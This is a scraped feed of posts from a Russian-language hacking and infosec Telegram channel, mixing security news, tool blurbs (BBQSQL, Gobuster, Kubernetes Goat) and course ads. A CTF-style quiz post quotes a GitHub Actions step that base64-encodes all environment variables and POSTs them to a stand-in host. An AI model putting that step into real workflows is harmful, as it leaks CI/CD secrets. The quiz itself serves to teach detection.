Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность

🔥 Строишь ИИ-агентов? Руководитель AI/ML-направления Сloud․ru покажет, где большинство архитектур ломаются, и как этого избежать. 18 июня в 19:00 совместно с Сloud․ru проведём открытый урок «Мультиагентные системы: почему большинство архитектур переусложнены». Спикер — Дмитрий Юдин, эксперт по масштабированию и оптимизации вычислительных ресурсов для ML. Под его руководством развивается Evolution AI Factory — цифровая среда для работы с GenAI. Он занимается развитием сервисов генеративного ИИ, инфраструктуры для обучения больших языковых моделей и внедрением интеллектуальных агентов. Что получишь на уроке: — критерии выбора между одним агентом и мультиагентной системой; — разбор популярных архитектурных ошибок; — реальные ограничения современных ИИ-агентов; — практические рекомендации по проектированию агентных систем. 🎁 Для участников урока подготовили промокод на скидку 10 000 ₽. 🗓️ Когда: 18 июня, 19:00 (МСК) 👉 Занять место на открытом уроке

👤 Nightmare Eclipse: исследователь, который держит Microsoft в тонусе С апреля 2026 анонимный исследователь Nightmare Eclipse, также известный как Chaotic Eclipse, публикует PoC для уязвимостей Windows почти сразу после Patch Tuesday. Часть багов уже получила CVE, а несколько уязвимостей попали в каталог CISA KEV из-за эксплуатации in the wild. Что уже было:

🔴 BlueHammer — LPE в Microsoft Defender 🔴 RedSun — LPE в Microsoft Defender 🔴 UnDefend — DoS в Microsoft Defender 🟡 GreenPlasma — LPE через CTFMON 🟡 YellowKey — обход BitLocker 🔴 RoguePlanet — новый zero-day в Defender с возможностью получить SYSTEM shell

❕ Паттерн: Microsoft закрывает одни дыры — через несколько часов или дней появляется новый PoC. Это уже не обычный ресерч, а затяжной конфликт между вендором и исследователем, где крайними становятся пользователи Windows. 🔤 Даже встроенные защитные компоненты вроде Defender сами остаются частью attack surface. А публичный PoC без coordinated disclosure быстро превращает уязвимость из «интересной находки» в реальный риск для инфраструктуры. Герой, нарушитель или симптом проблемы в индустрии — решайте сами. 🔗 Источник 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #zero_day_legends

🐧 awk, grep и sed: шпаргалки и примеры команд на заметку этичному хакеру 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

🛠 Инструмент для сложных blind SQLi BBQSQL — фреймворк для эксплуатации blind SQL-инъекций, когда данные приходится извлекать по косвенным признакам: времени ответа, размеру страницы, коду ответа и другим изменениям в приложении. Что умеет:

— time-based и boolean-based SQLi; — поддержка разных СУБД; — настройка собственных шаблонов инъекций; — параллельное выполнение запросов для ускорения извлечения данных; — работа через прокси, куки, заголовки и авторизацию; — кастомные Python-хуки для нестандартных сценариев.

Особенно полезен в ситуациях, когда sqlmap не справляется и требуется гибко адаптировать логику эксплуатации под конкретную уязвимость. 🔗 Ссылка на GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

🔊 Как обычный саундбар превратили в инструмент для взлома ПК Исследователь изучал прошивку Creative Sound Blaster Katana V2X, а в итоге обнаружил цепочку уязвимостей, позволяющую удалённо перепрошить устройство по Bluetooth без сопряжения. После модификации прошивки саундбар мог:

— выполнять роль HID-клавиатуры; — автоматически вводить команды на подключённом компьютере; — фактически работать как беспроводной Rubber Ducky.

❕ Атака не требовала физического доступа к ПК или самому устройству. 🔗 В статье: реверс прошивки, анализ BLE-протокола, обход механизмов защиты и создание собственного payload для устройства. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #breach_breakdown

🏃‍♀️ Эксплуатация race condition с помощью Turbo Intruder: гайд для начинающего этичного хакера Уязвимости race condition часто встречаются в веб-приложениях и приносят достойные вознаграждения в рамках багбаунти. Под катом вас ждет гайд по эксплуатации данного бага на примере Vulnerable PHP App (Race Condition). 👉 Читать 🔹 Курс «Основы IT для непрограммистов» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #ликбез

⛽ ATG под атакой: хакеры добрались до топливной инфраструктуры США CISA, ФБР, NSA и Министерство энергетики США выпустили совместный алерт о кибератаках на ATG — системы мониторинга топливных резервуаров. 🔜 Такие устройства показывают уровень топлива, температуру и возможные утечки. Их ставят на заправках, промышленных объектах, в энергетике и транспортной инфраструктуре. Что известно:

— под ударом ATG, доступные из интернета; — часть устройств использует дефолтные или слабые пароли; — Shadowserver нашёл 1061 открытую ATG-систему на 10001/tcp, 909 из них — в США; — после взлома можно менять настройки, отключать уведомления и маскировать проблемы с резервуарами.

📍 Навигация: [Вакансии] 🐸 Библиотека хакера #breach_breakdown

🔥 Инженерная методичка по ИИ от Романа Барлоса (Team Lead в Yandex Cloud) Продолжаем делиться экспертизой команды курса «Разработка ИИ-агентов». Роман собрал мастхев-инструменты и ключевые работы для тех, кто хочет выйти за рамки вайбкодинга. 🛠 Полезные инструменты:

• Understand Anything — граф знаний по коду и зависимостям. • DeepTutor — open-source платформа для персонализированного обучения. • Superpowers — набор практик для системной разработки с ИИ. • Awesome Agent Skills — коллекция навыков для ИИ-агентов.

📚  Ключевые работы по LLM:

• Attention Is All You Need (2017) — архитектура Transformer. • GPT-1 (2018) — начало эпохи GPT. • GPT-2 (2019) — решение новых задач без дообучения. • GPT-3 (2020) — обучение на примерах из запроса. • InstructGPT (2022) — RLHF и современные чат-боты.

На курсе Роман выступает консультантом программы: помогает формировать содержание уроков с опорой на актуальные инженерные практики». Занять свое место на потоке: 👉 Курс «Разработка ИИ-агентов»

🚩 Gobuster DNS Mode — полезные флаги для поиска поддоменов Если используете Gobuster для DNS-брутфорса, эти параметры стоит держать под рукой: 🈶 -d, --domain Указать целевой домен:

-d target.com 

🈶 -i, --show-ips Показывать IP-адреса найденных поддоменов. 🈶 -c, --show-cname Отображать CNAME-записи. 🈶 --wildcard Продолжить работу даже при обнаружении wildcard DNS. 🈶 --resolver Использовать свой DNS-резолвер:

--resolver 8.8.8.8 

Полезно при разведке внешней поверхности атаки и перечислении поддоменов. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #cheat_sheet #recon #gobuster

🐧 Шпаргалка по работе с командой less в Linux: на заметку этичному хакеру Команда less позволяет перематывать текст не только вперёд, но и назад, осуществлять поиск в обоих направлениях, переходить сразу в конец или в начало файла. 👉 Источник 🔹 Практический интенсив «Архитектуры и шаблоны проектирования» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

🗺 Как DPI распознаёт MTProto-прокси Полезный технический разбор про то, почему одной маскировки под TLS уже недостаточно. В статье объясняют:

— как работает Fake-TLS в MTProto; — почему JA3/JA4 fingerprint помогает находить неидеальный TLS; — как DPI анализирует размеры пакетов, тайминги и keep-alive; — почему зашифрованный payload всё равно оставляет сетевые метаданные; — где упирается предел DPI из-за стоимости глубокого анализа.

🔗 Читать подробнее 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

😎 Знакомьтесь с экспертом Proglib.academy: Senior Software Engineer и Team Lead в Yandex Cloud Роман Барлос Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки. За что его ценит IT-комьюнити? 🟣 Team Lead и AI-евангелист в команде UX Yandex Cloud

14-лет в разработке. Занимается AI-адопшеном в команде Yandex Cloud, проводит мастер-классы и продвигает лучшие практики для повышения эффективности разработчиков.

🟣 Техлид Sourcecraft Code Assistant

С сильным практическим бэкграундом принимал участие как технический лид в создании мощного AI-расширения для VS Code.

🟣 Создатель полезного Open Source

Разрабатывает утилиты, которые позволяют быстро начать эксперименты с инференсом и агентами в локальном окружении: например, набор скриптов vllm-setup для быстрого запуска окружения и mini-proxy — минималистичный прокси для OpenAI API провайдеров.

🟣 Автор интерактивных ML-визуализаций

Объясняет сложные концепции наглядно. Создал серию залипательных обучающих материалов, где можно вживую пощупать работу сетей Хопфилда, машин Больцмана и VC-размерности.

Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии. Узнать больше о программе и разработке автономных систем: 👉 Курс «Разработка ИИ-агентов» Так, продолжаем знакомить вас с командой? 👍 — Да, ждем новых лиц 🔥 — Жду полезные материалы от Романа

Как заплачено, так и нафигачено! 🤪 🐸 Библиотека хакера #hack_humor

🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру 🔹 Курс «Алгоритмы и структуры данных» 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #магиякода

💡 Крупнейший каталог OSINT-инструментов В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:

— Telegram — Социальные сети — Email и Username Search — Геолокация — Анализ доменов и IP — Утечки данных — Metadata Analysis — Threat Intelligence

➡️ Что удобно: — поиск по инструментам; — автоматическое обновление из GitHub; — более 50 категорий; — веб-версия, Android и desktop-клиент. Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров. 🔗 Ссылка 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #resource_drop

🧩 Хакер-челлендж Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow. Внутри добавили шаг:

- name: Debug publish   run: |     env | base64 | curl -s -X POST https://example[.]com/logs -d @-

Автор PR пишет:

«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».

❓ Что здесь нужно проверять в первую очередь? Голосуйте эмодзи: 🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу. 👾 — Dependency confusion: пакет подтягивается из внешнего registry. ❤️ — Cache poisoning: атакующий подменяет build cache. 👍 — Path traversal: workflow читает файлы за пределами проекта. 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #ctf_challenge

⚡️ Продолжаем знакомить вас с экспертами курса AgentOps! — Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов — Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем — Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена — Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation — Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса. 👉 Изучить обновленную программу AgentOps и занять место.

💻 Практика атак на Kubernetes Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике. ➡️ Что внутри: — ошибки RBAC и лишние привилегии — уязвимые контейнеры — небезопасные настройки кластера — privilege escalation — container escape — практические сценарии для Red Team и Blue Team Отличная площадка для изучения атак на Kubernetes в безопасной среде ✅ 🔗 Ссылка на GitHub 📍 Навигация: [Вакансии] 🐸 Библиотека хакера #tool_of_the_week

Подрядчик подключился к вашей системе. Работу сделал. Доступ остался. Знакомая ситуация? В какой-то момент становится сложно ответить на простой вопрос, кто сейчас вообще подключен к вашим ИТ-ресурсам и что там делает. Именно в таких сценариях чаще всего начинаются проблемы. Доступы выдаются быстро, а потом про них забывают. Контроль снижается, а одной ошибки или компрометации бывает достаточно, чтобы затронуть важные для компании системы. В канале Индид вы найдете материалы о том, как выстраивать защиту учетных данных, снижать риски инцидентов и всегда держать доступ к инфраструктуре под контролем. В нем вы сможете забрать гайд по работе с подрядчиками. Внутри: 📍 Ключевые риски ИБ при работе с подрядчиками 📍 Способы атак злоумышленников и их последствия 📍 Меры безопасности, регламентирующие получение прав доступа Подписывайтесь на канал Индид, чтобы регулярно читать практические материалы о защите доступа. #реклама О рекламодателе

Они прогрессируют, уже пытаются маскироваться под людей 🔹 Курс разработка AI-агентов 🔹 Получить консультацию менеджера 🔹 Сайт Академии 🔹 Сайт Proglib 🏃‍♀️ Азбука айтишника #небагафича